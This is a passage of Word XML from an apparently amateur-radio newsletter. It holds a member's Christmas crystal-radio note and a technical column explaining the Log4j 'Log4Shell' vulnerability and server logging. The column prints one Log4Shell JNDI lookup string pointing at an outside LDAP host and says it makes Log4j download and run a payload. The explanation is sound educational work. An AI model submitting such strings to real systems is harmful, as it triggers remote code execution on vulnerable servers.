                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>524510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="55" name="AutoShape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anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect w14:anchorId="5B15BB87" id="AutoShape 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:41.3pt;width:24pt;height:24pt;z-index:252986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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:wrap type="topAndBottom"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA0475" w:rsidRPr="00FA0475">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FA0475" w:rsidRPr="00FA0475">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB67B8" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E48400E" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358D1F62" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653952D6" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F00624" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB1810D" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6E961B" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="632619F9" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F4355E" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7D6ED4" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6967EF1A" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB133E1" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="332B0526" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586420FF" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455FB1F0" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8952F7" w14:textId="11C999A9" w:rsidR="00687242" w:rsidRPr="001D6216" w:rsidRDefault="00FA0475" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>I received this crystal radio kit for Christmas from my daughter. I built it into a cigar box as is only proper for this classic. The first radio I ever built as a child was a yellow plastic Remco crystal receiver.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D6216">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776D425A" wp14:editId="1C62B515">
            <wp:extent cx="3810000" cy="2533650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62" name="Picture 6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A picture containing text&#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810000" cy="2533650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="001D6216">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252988416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75E42C20" wp14:editId="7BC50F72">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>523875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="995045" cy="995045"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="60" name="AutoShape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995045" cy="995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anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect w14:anchorId="6AC845C5" id="AutoShape 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:41.25pt;width:78.35pt;height:78.35pt;z-index:252988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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:wrap type="square"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17A4CAB3" wp14:editId="0D71DF59">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="57" name="AutoShape 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948C35C" id="AutoShape 4"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FA0475">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">I remember </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>laying</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> in bed listening with the lights off when I was supposed to be sleeping. Looking out through a window near my bed I could see the blinking red lights on radio towers.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>I hope that you all give and receive something wonderful this season.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>   Merry Christmas</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>73</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>    Bob  KD8CGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C151F" w14:textId="77777777" w:rsidR="00FA0475" w:rsidRDefault="00FA0475" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5422FBD8" w14:textId="77777777" w:rsidR="00FA0475" w:rsidRDefault="00FA0475" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B763285" w14:textId="77777777" w:rsidR="00FA0475" w:rsidRDefault="00FA0475" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459D999C" w14:textId="5D247A57" w:rsidR="00CB5A9F" w:rsidRPr="003F5908" w:rsidRDefault="003F5908" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>________________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC03B78" w14:textId="3ECF80A0" w:rsidR="00CB5A9F" w:rsidRDefault="00CB5A9F" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE73FFB" w14:textId="495ABDD3" w:rsidR="00CB5A9F" w:rsidRDefault="00CB5A9F" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356B58C5" w14:textId="77777777" w:rsidR="003F5908" w:rsidRDefault="003F5908" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F96FBF2" w14:textId="26C02C2C" w:rsidR="00A87275" w:rsidRPr="004C34AE" w:rsidRDefault="004C34AE" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="tc"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="004C34AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252726272" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BCF76C1" wp14:editId="76C57ADF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4280535</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2362200" cy="2239010"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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362200" cy="2239010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A87275" w:rsidRPr="004C34AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>From the Technical Coordinator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C23FD" w14:textId="6EBD12D7" w:rsidR="00A87275" w:rsidRPr="00FD0EAD" w:rsidRDefault="00A87275" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>Jeff Kopcak – K8JTK   TC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0DA023" w14:textId="51885EBC" w:rsidR="00A87275" w:rsidRDefault="0084211F" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00A87275" w:rsidRPr="00FD0EAD">
          <w:rPr>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>k8jtk@arrl.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A87275" w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADF17E3" w14:textId="08C5463D" w:rsidR="00A87275" w:rsidRDefault="00A87275" w:rsidP="00A87275"/>
    <w:p w14:paraId="246DF655" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Hey gang,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298FF279" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">Ever hear the quote from a famous computer security professional, Bruce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Schneier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">, stating ‘vulnerabilities only ever get worse, they never get better?’ The Information Technology industry had it about as bad as it gets this month. A </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> in a Java logging utility, Log4j, obtained the highest severity rating, a CVSS score of 10.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> is a computer industry standard for rating vulnerabilities, 0 to 10 with 10 being the most severe.  Dubbed Log4Shell, this trivial attack can gain shell level access to a system, described as the “the single biggest, most critical vulnerability ever” by </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Ars </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Technica</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1255CC66" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">Most any IT applications or services have a server to handle requests.  This could be any of a web server, mail server, or even a game server hosted on the Internet. These servers generate logs such that administrators can </w:t>
      </w:r>
      <w:r w:rsidRPr="007A6C3F">
        <w:lastRenderedPageBreak/>
        <w:t>review them to validate the server is functioning correctly.  Logs are heavily relied upon when users report problems.  Admins use logs to recreate events of the past as part of troubleshooting.  This is referred to as the “/var/log” directory in Linux systems.  Anytime a request is made from a device to a server, that generates a log entry.  Apache web server logs contain things such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008F20A0" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Source/users IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE35D1D" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Date and time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6677E3D9" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Get or post.  Get retrieves data from the resource while post does the opposite, sends data to the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CD7A9" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>URL requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A25B2" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="0084211F" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>HTTP status codes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">. This is where the </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>404 “not found” meme</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> originates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4D316" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Size of the data returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C42E064" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>User agent which is accessing the resource, usually a browser.  May include other bits like operating system information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA7174B" w14:textId="0DFDDA9A" w:rsidR="00FF0FF5" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">A real log example from my webserver where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>AllStar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Allmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> are running (user’s IP address is replaced with 123.456.789.000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB7F5E6" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5"/>
    <w:p w14:paraId="31359694" w14:textId="52615BFC" w:rsidR="00FF0FF5" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>123.456.789.000 - - [18/Dec/2021:23:41:42 +0000] "GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>server.php?nodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">=1000,50394,1202,1203,1204 HTTP/1.1" 200 187395 "https://allmon2.k8jtk.org/link.php?nodes=1000,50394,1202,1203,1204" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Edg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/96.0.1054.57"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C12ADCE" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDE68D4" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t>An administrator may want to take actions based on the logs.  That’s where Log4j is added to the flow. The server will send logs to Log4j.  Log4j parses logs.  It decides to interpret or send them off for archival purposes in the file system or to a separate logging server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42688EA4" w14:textId="73A2C12D" w:rsidR="00FF0FF5" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t>A string such as the one below is passed to a web server. Log4j will act on it including download and execute any random payload that is returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9D99A" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5"/>
    <w:p w14:paraId="40350CB5" w14:textId="517DC555" w:rsidR="00FF0FF5" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>://log4shell.huntress.com:1389/unique-identifier}</w:t>
      </w:r>
    </w:p>
